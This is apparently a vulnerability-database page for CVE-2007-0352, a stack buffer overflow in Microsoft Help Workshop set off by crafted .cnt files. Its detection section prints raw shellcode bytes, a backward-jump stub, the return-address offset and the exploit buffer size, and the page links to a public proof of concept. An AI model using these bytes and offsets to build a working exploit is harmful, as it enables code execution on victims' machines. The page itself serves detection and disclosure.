CVE-2007-0352
published 2007-01-19CVE-2007-0352: Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
36.38%
98.3th percentile
Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file composed of lines that begin with an integer followed by a space and a long string.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | html_help_workshop | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0x66,0x83,0xc4,0x10,0x8b,0xc4,0x66,0x81,0xec,0x10,0x21,0x50,0x66,0x2d,0x11,0x11,0x50,0xb8,0x7a,0x6b,0x3f,0x79,0xff,0xd0,0x58,0x50,0x80,0x38,0x20,0x74,0x49,0x5b,0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,0xeb,0x11,0x05,0x53,0xb8,0x23,0x2d,0x3f,0x79,0x3c,0xff,0x75,0x02,0x32,0xc0,0xff,0xd0,0x58,0x50,0x66,0x2d,0x11,0x05,0x32,0xdb,0x38,0x18,0x74,0x03,0x40,0xeb,0xf9,0x5b,0x53,0x32,0xd2,0xb1,0x5c,0x88,0x08,0x40,0x38,0x13,0x74,0x08,0x8a,0x0b,0x88,0x08,0x43,0x40,0xeb,0xf4,0x32,0xd2,0x88,0x10,0x58,0x50,0x66,0x2d,0x11,0x05,0x48,0x40,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x11,0x11,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x3f,0x79,0xff,0xd0,0x33,0xc0,0x50,0xb8,0xda,0x69,0x3f,0x79,0xff,0xd0
bytes↗
0xe9,0x1b,0xfe,0xff,0xff
- →Malicious .cnt files triggering this vulnerability begin each line with an integer followed by a space and a long string — detect anomalously long lines (>500 bytes) in .cnt files opened by Help Workshop (hcw.exe). ↗
- →The exploit payload embeds the ASCII marker string '0 Microsoft Help Workshop PoC exploit by porkythepig' at the start of the crafted .cnt file; scan file content for this string. ↗
- →The exploit buffer is exactly 619 bytes; a .cnt file of exactly this size containing shellcode is a strong indicator of exploitation. ↗
- →The return address overwrite occurs at offset 0x210 (528 bytes) into the exploit buffer; stack inspection or crash analysis showing EIP control at this offset confirms exploitation. ↗
- →The backward jump stub (0xe9,0x1b,0xfe,0xff,0xff) is written at offset 0x218 in the buffer to redirect execution back into the shellcode; presence of this 5-byte near-jump sequence near the overwrite region is a shellcode indicator. ↗
- →Monitor hcw.exe (Microsoft Help Workshop) for spawning unexpected child processes such as notepad.exe or other user-supplied executables, which is the payload delivery mechanism of this exploit. ↗
- ·The exploit ships five hardcoded OS-specific API address tables (jmpEspPtr and API pointers); the correct table must match the target OS/DLL version — detections relying on specific return addresses will only match the targeted OS variant. ↗
- ·The vulnerability is user-assisted (requires the victim to open a crafted .cnt file); exploitation is not remote/unauthenticated without a social-engineering vector. ↗
- ·Microsoft Help Workshop 4.03.0002 is a standard component of MS Visual Studio 6.0 and 2003 (.NET); the attack surface exists on any developer workstation with these IDE versions installed. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/31898http://secunia.com/advisories/23862http://securityreason.com/securityalert/2156http://securitytracker.com/id?1017530http://www.anspi.pl/~porkythepig/visualization/cnt-expl1.cpphttp://www.securityfocus.com/archive/1/457210/100/0/threadedhttp://www.securityfocus.com/bid/22100https://exchange.xforce.ibmcloud.com/vulnerabilities/31555https://www.exploit-db.com/exploits/3149http://osvdb.org/31898http://secunia.com/advisories/23862http://securityreason.com/securityalert/2156http://securitytracker.com/id?1017530http://www.anspi.pl/~porkythepig/visualization/cnt-expl1.cpphttp://www.securityfocus.com/archive/1/457210/100/0/threadedhttp://www.securityfocus.com/bid/22100https://exchange.xforce.ibmcloud.com/vulnerabilities/31555https://www.exploit-db.com/exploits/3149
2007-01-19
Published